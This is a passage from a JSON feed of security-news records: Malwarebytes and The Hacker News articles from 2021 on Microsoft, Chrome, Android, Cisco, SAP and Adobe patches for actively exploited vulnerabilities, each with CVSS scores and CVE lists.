kernel information disclosure vulnerability, and [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>), a Windows NTFS elevation of privilege vulnerability.\n\n### Other critical issues\n\nThe other critical patches made available by Microsoft this June include these actively exploited vulnerabilities:\n\n * [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), a Microsoft DWM Core Library Elevation of Privilege Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n * [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>) Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n * [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>) another Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n\nNot (yet) actively exploited zero day vulnerability:\n\n * [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>) Windows Remote Desktop Services Denial of Service Vulnerability.\n\nOther critical updates:\n\n * [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) Microsoft SharePoint Server Remote Code Execution Vulnerability.\n * [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) Scripting Engine Memory Corruption Vulnerability.\n * [CVE-2021-31967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31967>) VP9 Video Extensions Remote Code Execution Vulnerability.\n * [CVE-2021-31985](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985>) Microsoft Defender Remote Code Execution Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n\n### Android\n\nThe [Android Security Bulletin of June 7](<https://source.android.com/security/bulletin/2021-06-01>) mentions a critical security vulnerability in the System component that "could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process", which is as bad as it sounds. That vulnerability, listed as [CVE-2021-0507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-0507>), could allow an attacker to take control of a targeted Android device unless it's patched.\n\n### Cisco\n\nCisco has issued a [patch](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-ssl-decrypt-dos-DdyLuK6c>) for a vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software, that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message **through** an affected device. SSL/TLS messages sent **to** an affected device do not trigger this vulnerability. Cisco informs us that there is no workaround for this issue. Patching is the only solution.\n\n### SAP\n\nIn the SAP advisory for [Security Patch Day \u2013 June 2021](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) we can find two issues that are labelled as \u201cHot News\u201d:\n\n * [CVE-2021-276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>) SAP Commerce, versions - 1808, 1811, 1905, 2005, 2011, Backoffice application allows certain authorized users to create source rules which are translated to drools rule when published to certain modules within the application. An attacker with this authorization can inject malicious code in the source rules and perform remote code execution enabling them to compromise the confidentiality, integrity and availability of the application.\n * [CVE-2021-27610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27610>) Improper Authentication in SAP NetWeaver ABAP Server and ABAP Platform.\n\n### Adobe\n\nTo top things off, Adobe has released a giant [Patch ](<https://helpx.adobe.com/security.html>)[Tuesday security update](<https://helpx.adobe.com/security.html>) release that fixes vulnerabilities in ten applications, including Adobe Acrobat (of course), Reader, and Photoshop. Notably five vulnerabilities in Adobe Acrobat and Reader were fixed that address multiple critical vulnerabilities. Acrobat's determination to cement its place as [the new Flash](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>) shows no sign of dimming.\n\nSuccessful exploitation could lead to arbitrary code execution in the context of the current user on both Windows and macOS. The same is true for two critical vulnerabilities in Photoshop that could lead to arbitrary code execution in the context of the current user.\n\n### CVE\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Which is why we try and link you to the Mitre list of CVE\u2019s where possible. It allows interested parties to find and compare vulnerabilities.\n\nHappy patching, everyone!\n\nThe post [Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-09T14:50:52", "type": "malwarebytes", "title": "Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0507", "CVE-2021-27602", "CVE-2021-27610", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T14:50:52", "id": "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:19", "description": "[](<https://thehackernews.com/images/-wb_mRqoRlJs/YH_fh-jU73I/AAAAAAAACUg/PjdPBbIeXIQL_vuc_D3kAe7us4v9piwdwCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Tuesday released an update for Chrome web browser for Windows, Mac, and Linux, with a total of seven security fixes, including one flaw for which it says an exploit exists in the wild.\n\nTracked as **CVE-2021-21224**, the flaw concerns a type confusion vulnerability in V8 open-source JavaScript engine that was reported to the company by security researcher Jose Martinez on April 5\n\nAccording to security researcher [Lei Cao](<https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html#rca-of-issue-1195777>), the bug [[1195777](<https://bugs.chromium.org/p/chromium/issues/detail?id=1195777>)] is triggered when performing integer data type conversion, resulting in an out-of-bounds condition that could be used to achieve arbitrary memory read/write primitive.\n\n\"Google is aware of reports that exploits for CVE-2021-21224 exist in the wild,\" Chrome's Technical Program Manager Srinivas Sista [said](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>) in a blog post.\n\n[](<https://thehackernews.com/images/-MqsPXUEBIAs/YH_gSVGkWZI/AAAAAAAACUw/ZOCKPD3LhzYIiPehN7StsViTVlFaKHhyACLcBGAsYHQ/s0/chrome-code.jpg>)\n\nThe update comes after proof-of-concept (PoC) [code](<https://noahblog.360.cn/chromium_v8_remote_code_execution_vulnerability_analysis/>) exploiting the flaw published by a researcher named \"[frust](<https://twitter.com/frust93717815/status/1382301769577861123>)\" emerged on April 14 by taking advantage of the fact that the issue was addressed in the [V8 source code](<https://chromium-review.googlesource.com/c/v8/v8/+/2826114/3/src/compiler/representation-change.cc>), but the patch was not integrated into the Chromium codebase and all the browsers that rely on it, such as Chrome, Microsoft Edge, Brave, Vivaldi, and Opera.\n\nThe one-week patch gap meant the browsers were vulnerable to attacks until the patches posted in the open-source code repository were released as a stable update.\n\nIt's worth noting that Google [halved](<https://groups.google.com/a/chromium.org/g/security-dev/c/fbiuFbW07vI>) the median \"patch gap\" from 33 days in Chrome 76 to 15 days in Chrome 78, which was released in October 2019, thereby pushing severe security fixes every two weeks.\n\nThe latest set of fixes also arrive close on the heels of an update the search giant rolled out [last week](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) with [patches for two security vulnerabilities](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) CVE-2021-21206 and CVE-2021-21220, the latter of which was demonstrated at the Pwn2Own [2021 hacking](<https://thehackernews.com/hacker/>) contest earlier this month.\n\nChrome 90.0.4430.85 is expected to roll out in the coming days. Users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-21T08:20:00", "type": "thn", "title": "Update Your Chrome Browser ASAP to Patch a Week Old Public Exploit", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224"], "modified": "2021-04-21T08:30:40", "id": "THN:FF8DAEC0AE0DDAE827D57407C51BE992", "href": "https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. The vulnerabilities that being actively exploited are listed below -\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * [**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis [credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": "https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:58", "description": "[](<https://thehackernews.com/images/--v2cn8JGV00/YMGRd9cFvrI/AAAAAAAACz4/i5Stk6m4GEgwbul82T6lZeEbdMMNfofJQCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg>)\n\nAttention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update it immediately to the latest version Google released earlier today.\n\nThe internet services company has rolled out an urgent update to the browser to address 14 newly discovered security issues, including a zero-day flaw that it says is being actively exploited in the wild.\n\nTracked as [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html>), the vulnerability stems from a type confusion issue in its V8 open-source and JavaScript engine. Sergei Glazunov of Google Project Zero has been credited with discovering and reporting the flaw.\n\nAlthough the search giant's Chrome team issued a terse statement acknowledging \"an exploit for CVE-2021-30551 exists in the wild,\" Shane Huntley, Director of Google's Threat Analysis Group, [hinted](<https://twitter.com/ShaneHuntley/status/1402712986289016835>) that the vulnerability was leveraged by the same actor that abused [CVE-2021-33742](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>), an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its Patch Tuesday update on June 8.\n\n[](<https://thehackernews.com/images/-XI4fkisfDp0/YMGPq0RtpKI/AAAAAAAACzw/d0mpshr20nw2j--sOXxBrrTJIj2IP95ewCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nThe two zero-days are said to have been provided by a commercial exploit broker to a nation-state actor, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley said.\n\nMore technical details about the nature of the attacks are to be released in the coming weeks so as to allow a majority of the users to install the update and prevent other threat actors from creating exploits targeting the flaw.\n\nWith the latest fix, Google has addressed a total of seven zero-days in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n\nChrome users can update to the latest version (91.0.4472.101) by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T04:14:00", "type": "thn", "title": "New Chrome 0-Day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-06-10T10:25:50", "id": "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "href": "https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[](<https://thehackernews.com/images/--Br-zb7NQb0/YPEUTqMvgsI/AAAAAAAADNw/cesEHjkHFKgyqC_MTP_ji5iUXUCeqoH1QCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle has pushed out a new security update to Chrome browser for Windows, Mac, and Linux with multiple fixes, including a zero-day that it says is being exploited in the wild.\n\nThe latest patch resolves a total of eight issues, one of which concerns a type confusion issue in its V8 open-source and JavaScript engine ([CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>)). The search giant credited an anonymous researcher for reporting the flaw on July 12.\n\nAs is usually the case with actively exploited flaws, the company issued a terse statement acknowledging that \"an exploit for CVE-2021-30563 exists in the wild\" while refraining from sharing full details about the underlying vulnerability used in the attacks due to its serious nature and the possibility that doing so could lead to further abuse.\n\nCVE-2021-30563 also marks the ninth zero-day addressed by Google to combat real-world attacks against Chrome users since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n\nChrome users are advised to update to the latest version (91.0.4472.164) by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-16T05:08:00", "type": "thn", "title": "Update Your Chrome Browser to Patch New Zero\u2011Day Bug Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563"], "modified": "2021-07-16T05:08:47", "id": "THN:C736174C6B0ADC38AA88BC58F30271DA", "href": "https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:19", "description": "[](<https://thehackernews.com/images/-FOgCdN3CSOk/YUAgGS1bB1I/AAAAAAAADyc/2oKkq_Mon1AnpsrRVosSNgmXm6ZdbQTXACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Monday released security updates for Chrome web browser to address a total of 11 security issues, two of which it says are actively exploited zero-days in the wild.\n\nTracked as **CVE-2021-30632** and **CVE-2021-30633**, the [vulnerabilities](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) concern an out of bounds write in V8 JavaScript engine and a use after free flaw in Indexed DB API respectively, with the internet giant crediting anonymous researchers for reporting the bugs on September 8.\n\nAs is typically the case, the company said it's \"aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild\" without sharing additional specifics about how, when, and where the vulnerabilities were exploited, or the threat actors that may be abusing them.\n\nWith these two security shortcomings, Google has addressed a total of 11 zero-day vulnerabilities in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n\nChrome users are advised to update to the latest version (93.0.4577.82) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 